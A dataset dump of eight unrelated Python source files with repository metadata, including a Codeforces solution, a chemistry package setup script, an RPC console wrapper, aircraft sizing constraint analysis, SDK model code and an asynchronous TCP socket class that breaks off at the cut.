f898bc011b7d9345fbef96b0f970ceb599a3409a | 6f1d57238f3b395b04696a16768bcc507f00630c | /A_Comparing_Strings.py | 283a2e89d3cfcd5b5fe35998a4154d040395da59 | [] | no_license | FazleRabbbiferdaus172/Codeforces_Atcoder_Lightoj_Spoj | 024a4a2a627de02e4698709d6ab86179b8301287 | 6465e693337777e7bd78ef473b4d270ce757a3a2 | refs/heads/master | 2023-07-01T06:32:14.775294 | 2021-07-27T17:07:37 | 2021-07-27T17:07:37 | 271,202,781 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | import sys
s1 = list(input())
s2 = list(input())
d1, d2 = dict(), dict()
miss = 0
if len(s1) != len(s2):
print("NO")
sys.exit(0)
for i in range(97, 97+26):
d1[chr(i)] = 0
d2[chr(i)] = 0
for i in range(len(s1)):
d1[s1[i]] += 1
d2[s2[i]] += 1
if s1[i] != s2[i]:
miss += 1
if d1 == d2 and miss == 2:
print("YES")
else:
print("NO")
| [
"[email protected]"
] | |
213d25bf84577a6d3302247cb04c2a0af37c66c0 | 1abd2d4fe2f01584bf0aab44d7e98e76f7280f9f | /setup.py | 5f1ae46c490365023591c75ca903926ea2fd28c3 | [] | no_license | yychuang/GenIce | b370c046cb4eec134ab80f7faa36aeb00f52786e | 80b836df7208be3d830bd276924a0a91635eded7 | refs/heads/main | 2023-06-06T18:24:23.242385 | 2021-06-28T08:57:25 | 2021-06-28T08:57:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,652 | py | #!/usr/bin/env python3
from setuptools import setup, find_packages
import os
import codecs
import re
# Copied from wheel package
here = os.path.abspath(os.path.dirname(__file__))
#README = codecs.open(os.path.join(here, 'README.txt'), encoding='utf8').read()
#CHANGES = codecs.open(os.path.join(here, 'CHANGES.txt'), encoding='utf8').read()
with codecs.open(os.path.join(os.path.dirname(__file__), 'genice2', '__init__.py'),
encoding='utf8') as version_file:
metadata = dict(
re.findall(
r"""__([a-z]+)__ = "([^"]+)""",
version_file.read()))
long_desc = "".join(open("README.md").readlines())
with open("requirements.txt") as f:
requires = [x.strip() for x in f.readlines()]
setup(name='GenIce2',
python_requires='>=3.6',
version=metadata['version'],
description='A Swiss army knife to generate hydrogen-disordered ice structures.',
long_description=long_desc,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
],
author='Masakazu Matsumoto',
author_email='[email protected]',
url='https://github.com/vitroid/GenIce/',
keywords=['genice2', ],
license='MIT',
packages=find_packages(),
install_requires=requires,
entry_points={
'console_scripts': [
'genice2 = genice2.cli.genice:main',
'analice2 = genice2.cli.analice:main'
]
}
)
| [
"[email protected]"
] | |
83e984bf7313b99dd2e24c39e24640b35d45e344 | a2706c66c4f2769c00fc5f67e1a85742cfa7e17c | /WebSocket/Handle/console.py | 71d912effb8fa4a6b590eaf8e05ac2ba4968e4fc | [
"BSD-3-Clause"
] | permissive | Jeromeyoung/viperpython | 48800312dcbdde17462d28d45865fbe71febfb11 | ba794ee74079285be32191e898daa3e56305c8be | refs/heads/main | 2023-09-01T18:59:23.464817 | 2021-09-26T04:05:36 | 2021-09-26T04:05:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,131 | py | # -*- coding: utf-8 -*-
# @File : console.py
# @Date : 2021/2/26
# @Desc :
from Lib.configs import RPC_FRAMEWORK_API_REQ
from Lib.log import logger
from Lib.method import Method
from Lib.rpcclient import RpcClient
from Lib.xcache import Xcache
class Console(object):
def __init__(self):
pass
@staticmethod
def get_active_console():
result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
return False
else:
consoles = result.get("consoles")
if len(consoles) == 0:
consoles_create_opt = {"SkipDatabaseInit": True, 'AllowCommandPassthru': False}
result = RpcClient.call(Method.ConsoleCreate, [consoles_create_opt], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
return False
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
return True
else:
active_id = int(consoles[0].get("id"))
Xcache.set_console_id(active_id)
return True
@staticmethod
def reset_active_console():
result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
else:
consoles = result.get("consoles")
if len(consoles) == 0:
pass
else:
for console in consoles: # 删除已知命令行
cid = int(console.get("id"))
params = [cid]
RpcClient.call(Method.ConsoleDestroy, params, timeout=RPC_FRAMEWORK_API_REQ)
result = RpcClient.call(Method.ConsoleCreate, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
@staticmethod
def write(data=None):
cid = Xcache.get_console_id()
if cid is None:
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
else:
return False, None
params = [cid, data.replace("\r\n", "\n")]
result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
params = [cid, data.replace("\r\n", "\n")]
result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
return False, None
else:
return True, result
else:
return False, result
else:
return True, result
@staticmethod
def read():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleRead, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def tabs(line=None):
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid, line]
result = RpcClient.call(Method.ConsoleTabs, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def session_detach():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleSessionDetach, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def session_kill():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleSessionKill, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
| [
"[email protected]"
] | |
c03381a3eb66d32c05604a2226fbaea846f8e98c | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/dbm.py | ac53fcf86f8ad981eb28108dc15d60478a2542de | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # encoding: utf-8
# module dbm
# from /usr/lib64/python2.6/lib-dynload/dbm.so
# by generator 1.136
# no doc
# no imports
# Variables with simple values
library = 'GNU gdbm'
# functions
def open(path, flag=None, mode=None): # real signature unknown; restored from __doc__
"""
open(path[, flag[, mode]]) -> mapping
Return a database object.
"""
pass
# classes
class error(Exception):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
| [
"[email protected]"
] | |
9726a9fbf16f8881db41c4e2da04c76e619bcd5f | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712183638.py | 3a1a9c53b9d9a89641bbb3d4af878f7d702672f8 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,856 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
# p_w[1, :] = 200 / (p_w[1, -1] - p_w[1, 20]) * (w_s - p_w[1, 2])
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
if i == 1 or i == 1+m :
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4])
#if k != 2:
# p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
#else:
# p_w[1 + m, :] = 200 / (p_w[1 + m, -1] - p_w[1 + m, 20]) * (w_s - p_w[1 + m, 2])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
] | |
f2d88ede145a55a634404601a3248fdd20b69f0c | 45de3aa97525713e3a452c18dcabe61ac9cf0877 | /src/primaires/perso/stat.py | 376ea04b6dc9b0fedb3545626465b19dc441e1d2 | [
"BSD-3-Clause"
] | permissive | stormi/tsunami | 95a6da188eadea3620c70f7028f32806ee2ec0d1 | bdc853229834b52b2ee8ed54a3161a1a3133d926 | refs/heads/master | 2020-12-26T04:27:13.578652 | 2015-11-17T21:32:38 | 2015-11-17T21:32:38 | 25,606,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,954 | py | # -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Ce fichier contient la classe Stat, détaillée plus bas."""
from abstraits.obase import BaseObj
from primaires.perso.exceptions.stat import *
# Flags :
NX = 0 # aucune exception ne sera levée
I0 = 1 # lève une exception si strictement inférieure à 0
IE0 = 2 # lève une exception si inférieure ou égale à 0
SM = 4 # lève une exception si strictement supérieure au MAX
SEM = 8 # lève une exception si supérieure ou égale au MAX
class Stat(BaseObj):
"""Cette classe définit une stat (ou caractéristique).
Les attributs d'une stat sont :
nom -- son nom
symbole -- son symbole (utile pour le prompt)
defaut -- sa valeur par défaut, celle donnée à un joueur à sa création
marge -- la marge maximale
max -- une chaîne de caractère représentant une autre stat
flags -- les flags indiquant quand une exception doit être levée
parent -- le parent hébergeant les stats
"""
_nom = "stat"
_version = 1
def __init__(self, nom, symbole, defaut, marge, max, flags=I0, parent=None):
"""Constructeur d'une stat.
Elle prend les mêmes paramètres que ceux passés dans l'ordre, dans
la configuration.
Voir : ./cfg_stats.py
"""
BaseObj.__init__(self)
self.nom = nom
self.symbole = symbole
self.defaut = defaut
self.marge_min = 0
self.marge_max = marge
self.nom_max = max
self.flags = flags
self.parent = parent
# Valeurs
self.__base = self.defaut
self.__variable = 0
self.__max = None
if self.parent and max:
self.__max = getattr(self.parent, "_{}".format(max))
self._construire()
def __getnewargs__(self):
return ("", "", "", 0, "")
def __repr__(self):
return "<stat {}={}>".format(self.nom, self.courante)
def __str__(self):
return "{}={} (base={}, variable={}, max={})".format(
self.nom, self.courante, self.base, self.variable, self.max)
@property
def base(self):
return self.__base
def _get_variable(self):
return self.__variable
def _set_variable(self, variable):
self.__variable = variable
variable = property(_get_variable, _set_variable)
@property
def max(self):
max = self.__max
if max:
max = max.courante
return max
def _get_courante(self):
return self.__base + self.__variable
def _set_courante(self, courante):
"""C'est dans cette propriété qu'on change la valeur courante
de la stat.
On passe par une méthode 'set' qui fait le travail.
"""
self.set(courante, self.flags)
courante = property(_get_courante, _set_courante)
def set(self, courante, flags):
"""Modifie la stat courante.
C'est dans cette méthode qu'on lève des exceptions en fonction des
valeurs modifiées.
NOTE IMPORTANTE: la valeur est modifiée quelque soit l'exception
levée. L'exception est levée pour réagir à un certain comportement
(par exemple, le joueur n'a plus de vitalité) mais elle n'empêchera
pas la stat d'être modifiée.
En revanche, on test bel et bien que la stat de base ne dépasse ni
le max ni la marge.
"""
base = courante - self.__variable
if self.parent and self.parent.parent and \
not self.parent.parent.est_immortel():
# Levée d'exceptions
if base < 0 and flags & I0:
self.__base = 0
raise StatI0
if base <= 0 and flags & IE0:
self.__base = 0
raise StatIE0
if self.max and flags & SM and base > self.max:
raise StatSM
if self.max and flags & SEM and base >= self.max:
raise StatSEM
if base > self.marge_max:
base = self.marge_max
if base < self.marge_min:
base = self.marge_min
if self.max and base > self.max:
base = self.max
if self.parent and self.parent.parent and \
self.parent.parent.est_immortel() and self.max:
base = self.max
self.__base = base
def __setattr__(self, nom, val):
BaseObj.__setattr__(self, nom, val)
| [
"[email protected]"
] | |
eebaf1cc5939bf3397f44b7abae4b3301b3f9927 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-cc/huaweicloudsdkcc/v3/model/update_network_instance_request_body.py | ccb6925b1dca4650bfa9c81651ceef569cd52c3e | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,407 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateNetworkInstanceRequestBody:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'network_instance': 'UpdateNetworkInstance'
}
attribute_map = {
'network_instance': 'network_instance'
}
def __init__(self, network_instance=None):
"""UpdateNetworkInstanceRequestBody
The model defined in huaweicloud sdk
:param network_instance:
:type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
self._network_instance = None
self.discriminator = None
self.network_instance = network_instance
@property
def network_instance(self):
"""Gets the network_instance of this UpdateNetworkInstanceRequestBody.
:return: The network_instance of this UpdateNetworkInstanceRequestBody.
:rtype: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
return self._network_instance
@network_instance.setter
def network_instance(self, network_instance):
"""Sets the network_instance of this UpdateNetworkInstanceRequestBody.
:param network_instance: The network_instance of this UpdateNetworkInstanceRequestBody.
:type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
self._network_instance = network_instance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateNetworkInstanceRequestBody):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
6ff299c2cc6c8b9893253d3ebe9d3ea491400c72 | 60be3894ad491bde502b8f6909a026ee115d952e | /aiosmb/network/tcp.py | 3da2e5cbc315e7cbcfde7804212c83c4942ef225 | [] | no_license | topotam/aiosmb | 7c97c6a9806c84a9fae28fa372cc6903fa6ec0c5 | e2ece67bbf380f576b154b09ea5fd63d9b4ecf4c | refs/heads/master | 2023-06-25T17:41:03.605226 | 2021-07-27T18:31:12 | 2021-07-27T18:31:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,676 | py | import enum
import asyncio
from aiosmb import logger
from aiosmb.commons.exceptions import *
class TCPSocket:
"""
Generic asynchronous TCP socket class, nothing SMB related.
Creates the connection and channels incoming/outgoing bytes via asynchonous queues.
"""
def __init__(self, socket = None, target = None):
self.settings = target
self.socket = socket #for future, if we want a custom soscket
self.reader = None
self.writer = None
self.out_queue = asyncio.Queue()
self.in_queue = asyncio.Queue()
self.disconnected = asyncio.Event()
self.incoming_task = None
self.outgoing_task = None
async def disconnect(self):
"""
Disconnects from the socket.
Stops the reader and writer streams.
"""
if self.disconnected.is_set():
return
if self.outgoing_task is not None:
self.outgoing_task.cancel()
if self.incoming_task is not None:
self.incoming_task.cancel()
if self.writer is not None:
try:
self.writer.close()
except:
pass
self.writer = None
self.reader = None
self.disconnected.set()
async def handle_incoming(self):
"""
Reads data bytes from the socket and dispatches it to the incoming queue
"""
try:
lasterror = None
msgsize = None
while not self.disconnected.is_set():
try:
data = await self.reader.readexactly(4)
msgsize = int.from_bytes(data[1:], byteorder='big', signed = False)
data = await self.reader.readexactly(msgsize)
await self.in_queue.put( (data, None) )
if data == b'':
return
except asyncio.CancelledError as e:
lasterror = e
break
except Exception as e:
logger.debug('[TCPSocket] handle_incoming %s' % str(e))
lasterror = e
break
except asyncio.CancelledError:
return
except Exception as e:
lasterror = e
finally:
if self.in_queue is not None:
await self.in_queue.put( (None, lasterror) )
await self.disconnect()
async def handle_outgoing(self):
"""
Reads data bytes from the outgoing queue and dispatches it to the socket
"""
try:
while not self.disconnected.is_set():
data = await self.out_queue.get()
self.writer.write(data)
await self.writer.drain()
